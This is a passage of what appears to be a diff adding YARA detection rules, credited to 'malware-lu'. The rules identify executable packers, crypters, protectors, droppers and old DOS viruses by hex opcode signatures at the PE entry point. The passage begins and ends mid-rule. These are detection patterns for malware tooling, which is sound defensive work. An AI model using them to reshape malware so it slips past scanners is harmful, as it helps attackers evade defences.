+		$a0 = { BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AnslymCrypter
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 38 17 05 10 E8 5A 45 FB FF 33 C0 55 68 21 1C 05 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 E8 85 4C FB FF 6A 00 E8 0E 47 FB FF 6A 0A E8 27 49 FB FF E8 EA 47 FB FF 6A 0A 68 30 1C 05 10 A1 60 56 05 10 50 E8 68 47 FB FF 8B D8 85 DB 0F 84 B6 02 00 00 53 A1 60 56 05 10 50 E8 F2 48 FB FF 8B F0 85 F6 0F 84 A0 02 00 00 E8 F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARMProtectorv02SMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 09 20 40 00 EB 02 83 09 8D B5 9A 20 40 00 EB 02 83 09 BA 0B 12 00 00 EB 01 00 8D 8D A5 32 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrypKeyV56XDLLKenonicControlsLtd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 1D ?? ?? ?? ?? 83 FB 00 75 0A E8 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev102v104BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxHeloween1172
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? 56 50 06 0E 1F 8C C0 01 ?? ?? 01 ?? ?? 80 ?? ?? ?? ?? 8B ?? ?? A3 ?? ?? 8A ?? ?? A2 ?? ?? B8 ?? ?? CD 21 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PackedwithPKLITEv150withCRCcheck1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1F B4 09 BA ?? ?? CD 21 B8 ?? ?? CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pe123v2006412
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C0 60 9C E8 01 00 00 00 C3 53 E8 72 00 00 00 50 E8 1C 03 00 00 8B D8 FF D3 5B C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B C0 55 8B EC 60 8B 4D 10 8B 7D 0C 8B 75 08 F3 A4 61 5D C2 0C 00 E8 00 00 00 00 58 83 E8 05 C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DropperCreatorV01Conflict
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 8D 05 ?? ?? ?? ?? 29 C5 8D 85 ?? ?? ?? ?? 31 C0 64 03 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 }
+
+condition:
+		$a0
+}
+	
+	
+rule XCRv013
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 93 71 08 ?? ?? ?? ?? ?? ?? ?? ?? 8B D8 78 E2 ?? ?? ?? ?? 9C 33 C3 ?? ?? ?? ?? 60 79 CE ?? ?? ?? ?? E8 01 ?? ?? ?? ?? 83 C4 04 E8 AB FF FF FF ?? ?? ?? ?? 2B E8 ?? ?? ?? ?? 03 C5 FF 30 ?? ?? ?? ?? C6 ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XCRv012
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C E8 ?? ?? ?? ?? 8B DD 5D 81 ED ?? ?? ?? ?? 89 9D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModulev129
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 EC 89 45 C0 E8 5B 73 FF FF E8 D6 87 FF FF E8 C5 A9 FF FF E8 E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov3xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule dUP2xPatcherwwwdiablo2oo2cjbnet
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B CB 85 C9 74 ?? 80 3A 01 74 08 AC AE 75 0A 42 49 EB EF 47 46 42 49 EB E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02PEProtect09Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 07 00 00 00 58 83 C0 07 C6 90 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule pscrambler12byp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 04 00 00 00 6A 00 6A 00 49 75 F9 51 53 ?? ?? ?? ?? 10 E8 2D F3 FF FF 33 C0 55 68 E8 31 00 10 64 FF 30 64 89 20 8D 45 E0 E8 53 F5 FF FF 8B 45 E0 8D 55 E4 E8 30 F6 FF FF 8B 45 E4 8D 55 E8 E8 A9 F4 FF FF 8B 45 E8 8D 55 EC E8 EE F7 FF FF 8B 55 EC B8 C4 54 00 10 E8 D9 EC FF FF 83 3D C4 54 00 10 00 0F 84 05 01 00 00 80 3D A0 40 00 10 00 74 41 A1 C4 54 00 10 E8 D9 ED FF FF E8 48 E0 FF FF 8B D8 A1 C4 54 00 10 E8 C8 ED FF FF 50 B8 C4 54 00 10 E8 65 EF FF FF 8B D3 59 E8 69 E1 FF FF 8B C3 E8 12 FA FF FF 8B C3 E8 33 E0 FF FF E9 AD 00 00 00 B8 05 01 00 00 E8 0C E0 FF FF 8B D8 53 68 05 01 00 00 E8 57 F3 FF FF 8D 45 DC 8B D3 E8 39 ED FF FF 8B 55 DC B8 14 56 00 10 B9 00 32 00 10 E8 BB ED FF FF 8B 15 14 56 00 10 B8 C8 54 00 10 E8 53 E5 FF FF BA 01 00 00 00 B8 C8 54 00 10 E8 8C E8 FF FF E8 DF E0 FF FF 85 C0 75 52 6A 00 A1 C4 54 00 10 E8 3B ED FF FF 50 B8 C4 54 00 10 E8 D8 EE FF FF 8B D0 B8 C8 54 00 10 59 E8 3B E6 FF FF E8 76 E0 FF FF B8 C8 54 00 10 E8 4C E6 FF FF E8 67 E0 FF FF 6A 00 6A 00 6A 00 A1 14 56 00 10 E8 53 EE FF FF 50 6A 00 6A 00 E8 41 F3 FF FF 80 3D 9C 40 00 10 00 74 05 E8 EF FB FF FF 33 C0 5A 59 59 64 89 10 68 EF 31 00 10 8D 45 DC BA 05 00 00 00 E8 7D EB FF FF C3 E9 23 E9 FF FF EB EB 5B E8 63 EA FF FF 00 00 00 FF FF FF FF 08 00 00 00 74 65 6D 70 2E 65 78 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor2223compressedcodewwwstrongbitcom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 ?? ?? ?? ?? ?? 8B 1C 24 81 EB ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 6A 04 68 00 10 00 00 50 6A 00 B8 C4 ?? ?? ?? 8B 04 18 FF D0 59 BA ?? ?? ?? ?? 01 DA 52 53 50 89 C7 89 D6 FC F3 A4 B9 ?? ?? ?? ?? 01 D9 FF D1 58 8B 1C 24 68 00 80 00 00 6A 00 50 }
+	$a1 = { E8 00 00 00 00 58 ?? ?? ?? ?? ?? 8B 1C 24 81 EB ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 6A 04 68 00 10 00 00 50 6A 00 B8 C4 ?? ?? ?? 8B 04 18 FF D0 59 BA ?? ?? ?? ?? 01 DA 52 53 50 89 C7 89 D6 FC F3 A4 B9 ?? ?? ?? ?? 01 D9 FF D1 58 8B 1C 24 68 00 80 00 00 6A 00 50 B8 C8 ?? ?? ?? 8B 04 18 FF D0 59 58 5B 83 EB 05 C6 03 B8 43 89 03 83 C3 04 C6 03 C3 09 C9 74 46 89 C3 E8 A0 00 00 00 FC AD 83 F8 FF 74 38 53 89 CB 01 C3 01 0B 83 C3 04 AC 3C FE 73 07 25 FF 00 00 00 EB ED 81 C3 FE 00 00 00 09 C0 7A 09 66 AD 25 FF FF 00 00 EB DA AD 4E 25 FF FF FF 00 3D FF FF FF 00 75 CC ?? ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule Armadillov265b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 38 ?? ?? ?? 68 40 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 F4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117aPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 74 1F 00 00 8D 9D 1E 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyCryptPE214b215JLabSoftwareCreationshoep
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 91 8B F4 AD FE C9 80 34 08 ?? E2 FA C3 60 E8 ED FF FF FF EB }
+
+condition:
+		$a0
+}
+	
+	
+rule yodasProtector10xAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack_UnknownDLLDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 09 00 00 00 17 CD 00 00 E9 06 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AINEXEv21
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A1 ?? ?? 2D ?? ?? 8E D0 BC ?? ?? 8C D8 36 A3 ?? ?? 05 ?? ?? 36 A3 ?? ?? 2E A1 ?? ?? 8A D4 B1 04 D2 EA FE C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AppProtectorSilentTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 97 00 00 00 0D 0A 53 69 6C 65 6E 74 20 54 65 61 6D 20 41 70 70 20 50 72 6F 74 65 63 74 6F 72 0D 0A 43 72 65 61 74 65 64 20 62 79 20 53 69 6C 65 6E 74 20 53 6F 66 74 77 61 72 65 0D 0A 54 68 65 6E 6B 7A 20 74 6F 20 44 6F 63 68 74 6F 72 20 58 0D 0A 0D 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RODHighTECHAyman
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 8B 15 1D 13 40 00 F7 E0 8D 82 83 19 00 00 E8 58 0C 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ICrypt10byBuGGz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 70 3B 00 10 E8 3C FA FF FF 33 C0 55 68 6C 3C 00 10 64 FF 30 64 89 20 6A 0A 68 7C 3C 00 10 A1 50 56 00 10 50 E8 D8 FA FF FF 8B D8 53 A1 50 56 00 10 50 E8 0A FB FF FF 8B F8 53 A1 50 56 00 10 50 E8 D4 FA FF FF 8B D8 53 E8 D4 FA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 64 56 00 10 E8 25 F6 FF FF B8 64 56 00 10 E8 13 F6 FF FF 8B CF 8B D6 E8 E6 FA FF FF 53 E8 90 FA FF FF 8D 4D EC BA 8C 3C 00 10 A1 64 56 00 10 E8 16 FB FF FF 8B 55 EC B8 64 56 00 10 E8 C5 F4 FF FF B8 64 56 00 10 E8 DB F5 FF FF E8 56 FC FF FF 33 C0 5A 59 59 64 89 10 68 73 3C 00 10 8D 45 EC E8 4D F4 FF FF C3 E9 E3 EE FF FF EB F0 5F 5E 5B E8 4D F3 FF FF 00 53 45 54 ?? ?? ?? ?? 00 FF FF FF FF 08 00 00 00 76 6F 74 72 65 63 6C 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPackv099
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 83 ED 06 80 BD E0 04 ?? ?? 01 0F 84 F2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV115V117LZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 83 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB 14 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxQuake518
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C C8 8E D8 ?? ?? ?? ?? ?? ?? ?? B8 21 35 CD 21 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4UnextractableVirusShield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 40 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium13013ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV130XObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MetrowerksCodeWarriorv20Console
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 55 B8 FF FF FF FF 50 50 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 E8 ?? ?? 00 00 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESpinv07Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimpleUPXCryptorV3042005MANtiCORE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinRAR32bitSFXModule
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? 00 00 00 00 00 00 90 90 90 ?? ?? ?? ?? ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule iPBProtect013017forgot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 4B 43 55 46 68 54 49 48 53 64 A1 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeASPack211demadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv036alphaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { AB E2 E5 5D 59 8B 76 68 51 59 46 AD 85 C0 }
+
+condition:
+		$a0
+}
+	
+	
+rule CrinklerV03V04RuneLHStubbeandAskeSimonChristensen
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 42 00 31 DB 43 EB 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DingBoysPElockPhantasmv10v11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 66 81 C3 EB 02 EB FC 66 81 C3 EB 02 EB FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactV2XBitsumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CRYPTVersion17cDismember
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 17 9C 58 F6 ?? ?? 74 ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxXPEH4768
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5B 81 ?? ?? ?? 50 56 57 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? ?? B8 01 00 50 B8 ?? ?? 50 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECrypt32v102
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 83 ?? ?? EB ?? 52 4E 44 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PESHiELD025Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2B 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC CC E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NETDLLMicrosoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00 00 ?? 00 00 FF 25 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100DLLLZMABeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F9 81 FE ?? ?? ?? ?? 7F 10 AC 47 04 18 2C 02 73 F0 29 3E 03 F1 03 F9 EB E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02ExeSmasherAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C FE 03 90 60 BE 90 90 41 90 8D BE 90 10 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 FE 0B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV125ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv107bDLLAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MicroJoiner17coban2k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 00 10 40 00 8D 5F 21 6A 0A 58 6A 04 59 60 57 E8 8E 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeVOBProtectCDFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 5F 81 EF 00 00 00 00 BE 00 00 40 00 8B 87 00 00 00 00 03 C6 57 56 8C A7 00 00 00 00 FF 10 89 87 00 00 00 00 5E 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CelsiusCrypt21Z3r0
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 84 92 44 00 E8 C8 FE FF FF 90 8D B4 26 00 00 00 00 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 84 92 44 00 E8 A8 FE FF FF 90 8D B4 26 00 00 00 00 55 8B 0D C4 92 44 00 89 E5 5D FF E1 8D 74 26 00 55 8B 0D AC 92 44 00 89 E5 5D FF E1 90 90 90 90 55 89 E5 5D E9 77 C2 00 00 90 90 90 90 90 90 90 55 89 E5 83 EC 28 8B 45 10 89 04 24 E8 3F 14 01 00 48 89 45 FC 8B 45 0C 48 89 45 F4 8D 45 F4 89 44 24 04 8D 45 FC 89 04 24 E8 12 A3 03 00 8B 00 89 45 F8 8B 45 FC 89 45 F0 C6 45 EF 01 C7 45 E8 00 00 00 00 8B 45 E8 3B 45 F8 73 39 80 7D EF 00 74 33 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 1C 1A 01 00 89 C1 8B 45 08 8B 55 E8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 8D 45 E8 FF 00 EB BF 83 7D F0 00 74 34 80 7D EF 00 74 2E 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 DD 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 EB C6 C7 44 24 04 00 00 00 00 8B 45 10 89 04 24 E8 AE 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 7F 0C 0F B6 45 EF 83 E0 01 88 45 E7 EB 04 C6 45 E7 00 0F B6 45 E7 88 45 EF 0F B6 45 EF C9 C3 }
+	$a1 = { 55 89 E5 83 EC 28 8B 45 10 89 04 24 E8 3F 14 01 00 48 89 45 FC 8B 45 0C 48 89 45 F4 8D 45 F4 89 44 24 04 8D 45 FC 89 04 24 E8 12 A3 03 00 8B 00 89 45 F8 8B 45 FC 89 45 F0 C6 45 EF 01 C7 45 E8 00 00 00 00 8B 45 E8 3B 45 F8 73 39 80 7D EF 00 74 33 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 1C 1A 01 00 89 C1 8B 45 08 8B 55 E8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 8D 45 E8 FF 00 EB BF 83 7D F0 00 74 34 80 7D EF 00 74 2E 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 DD 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 EB C6 C7 44 24 04 00 00 00 00 8B 45 10 89 04 24 E8 AE 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 7F 0C 0F B6 45 EF 83 E0 01 88 45 E7 EB 04 C6 45 E7 00 0F B6 45 E7 88 45 EF 0F B6 45 EF C9 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule Armadillov260
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 D0 ?? ?? ?? 68 34 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 68 ?? ?? ?? 33 D2 8A D4 89 15 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov261
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 28 ?? ?? ?? 68 E4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeASPack212emadicius
+{
